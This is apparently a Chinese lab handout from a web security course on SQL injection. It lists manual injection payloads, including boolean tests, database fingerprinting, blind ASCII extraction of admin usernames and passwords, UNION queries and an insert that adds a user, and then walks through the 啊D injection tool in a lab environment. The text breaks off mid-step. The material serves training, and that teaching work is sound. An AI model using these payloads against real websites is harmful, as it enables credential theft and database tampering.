L003001012-HTTP攻击与防范-SQL注入攻击-02啊D工具实例

课程编写类别内容实验课题名称HTTP攻击与防范-SQL注入攻击-02啊D工具实例实验目的与要求1、了解常用web脚本2、了解常用web脚本漏洞的利用点实验环境VPC1(虚拟PC）操作系统类型：windows；网络接口：本地连接VPC1连接要求PC网络接口，本地连接与实验网络直连软件描述1、学生机要求安装java环境

2、vpc安装windows实验环境描述学生机与实验室网络直连;VPC1与实验室网络直连;学生机与VPC1物理链路连通；预备知识1、类型：数字型：and1=1and1=2判断是否存在注入字符型：'and'1'='1'and'1'='2搜索型：关键字%'and1=1and'%'='%关键字%'and1=2and'%'='%2、IIS报错情况下使用：anduser>0（判断是ACCESS还是MSSQL）3、不报错则使用各自数据库特性来判断and(selectcount(*)frommsysobjects)>0（返回权限不足access数据库）and(selectcount(*)fromsysobjects)>0（返回正常则为MSSQL数据库）anddb_name（）>0(返回数据库名)and0<>(select@@version)--(判断版本信息)anddb_name（）>0（返回数据库名）************注意：猜解之前先要找到后台地址，不然白忙了**********4、ACCESS注入：（1）猜解表名（正常则存在admin,不正常则不存在）andexists(select*from[admin])and(SelectCount(*)fromAdmin)>0（2）猜解字段:（字段username存在则正常，不正常则不存在）and(SelectusernamefromAdmin)>0andexists(selectusernamefrom[admin])（3）猜解用户名和密码长度and(selecttop1len(username)fromAdmin)>0and(selecttop1len(password)fromAdmin)>05、原理：如果top1的username长度大于0，则条件成立；接着就是>1、>2、>3这样测试下去，一直到条件不成立为止，比如>4成立，>5不成立，就是len(username)=5,即用户名长度为5.得到username的长度后，用mid(username,N,1)截取第N位字符，再asc(mid(username,N,1))得到ASCII码.6、猜解用户and(selecttop1asc(mid(username,1,1))fromAdmin)>0,1,2…,当输入到109时，显示错误，而108之前显示正确，说明第一个字符的ASCII码为109，得到第一个字符是m。同理and(selecttop1asc(mid(username,2，1)fromAdmin)>0,1,2…到114的时候不成立，说明第二个字符的ASCII码值为114，字符为r。注意的是英文和数字的ASCII码在1-128之间...7、MSSQL注入：having1=1--【爆出一个表名及字段，如：列'users.ID'在选择列表中无效】groupbyusers.IDhaving1=1--groupbyusers.ID,users.username,users.password,users.privshaving1=1--insertintousersvalues(666,attacker,foobar,0xffff)--【插入新记录】8、猜解表名：SQLSERVER的每一个数据库都会有用户表和系统表，在系统表sysobjects中，数据库内创建的每个对象（约束、默认值、日志、规则、存储过程等）在sysobjects表中占一行，那么也就是说当前数据库的表名都会在该表内有存在。我们常用到的参数有三个，name（数据表的名字），xtype（数据表的类型u为用户表），id（数据表的对象标志）。and(selecttop1namefromsysobjectswherextype='u')>0(得到第一个表名:比如user)and(selecttop1namefromsysobjectswherextype='u'andnamenotin('user'))>0得到第二个表名，后面的以此类推。9、猜解列名：用到系统自带的2个函数col_name()和object_id()，col_name()的格式是“COL_NAME(table_id,column_id)参数table_id是表的标识号，column_id是列的标识号，object_id(admin)就是得到admin在sysobjects中的标识号，column_id=1,2,3表明admin的第1，2，3列。and(selecttop1col_name(object_id('admin'),1)fromsysobjects)>0【得到admin字段的第一个列名“username”依次类推，得到“password”“id”等等】10、猜解字段内容：and(selecttop1usernamefrom[admin])>0【直接得到用户名】and(selecttop1passwordfrom[admin])>0【直接得到密码】UNION联合查询：selectname,password,idfromuserunionselectuser,pwd,uidfrom表名and1=1unionselect1,2,3,4,5...from表名(数值从1开始慢慢加，如果加到5返回正常，那就存在5个字段)ASCII逐字解码法：（1）猜解列长度and(selecttop1len(列名)from表名)>N其中N是数字，变换这个N的值猜解列长度，当N为6正确，为7错误，则长度为7猜解第二条记录就该使用：selecttop1len(列名)from表名where列名notin(selecttop1列名from表名)（2）猜解用户和密码ASC()函数和Mid函数,ASC(mid(列名,N,1))得到“列名”第N位字符ASCII码猜解语句为：and(selecttop1asc(mid(字段,1,1))from数据库名)>ASCII码区间判断语句：....between......and......中文处理法:当ASCII转换后为“负数”使用abs()函数取绝对值。例：and(selecttop1abs(asc(mid(字段,1,1)))from数据库名)=ASC码（3）ASCII逐字解码法的应用：1、猜解表名：and(selectcount(*)fromadmin)<>02、猜解列名：and(selectcount(列名)from表名)<>03、猜解用户个数：and(selectcount(*)from表名)>1,2..2正常，3错误，表中有3条记录。4、猜解用户名的长度：and(selectlen(列名)from表名)>=1、>=2、>=3、>=4。5、猜解用户名：and(selectcount(*)from表名where(asc(mid(列名,1,1)))between30and130)<>0最后提交：and(selectasc(mid(列名,1,1))from表名)=ascii的值6、猜解管理员的密码：按照上面的原理，把上面的语句中(asc(mid(列名,1,1)的列名换成PASSWORD就能得到密码了。实验内容掌握Web脚本利用掌握Web漏洞利用点掌握SQL注入工具的使用实验步骤实验操作学生单击实验拓扑按钮，进入实验场景，（第一次启动目标主机，还需要安装java控件）。，学生输入账号administrator，密码123456，登录到实验场景中的目标主机。如图所示：打开IE浏览器，登录网站。如图所示：打开D:\tools目录啊D.rar解压包，点击啊D->QiQi.exe。如图所示：打开QiQi.exe软件，点击登录进入。如图所示：点击登陆：在检测网址栏中输入，点击扫描注入点，并点击打开网页。如图所示：注：图中4就是检测出来可用注入的点。双击“可用注入点”中的红色网址。进入如图所示页面：点击检测按钮，软件提示准备就绪，点击检测表段，即可对字段进行扫描。如图所示：9、点击检测表段中的“admin”，然后点击检测字段。即可看到如图所示字段：10、勾选上username、password、id并点击检测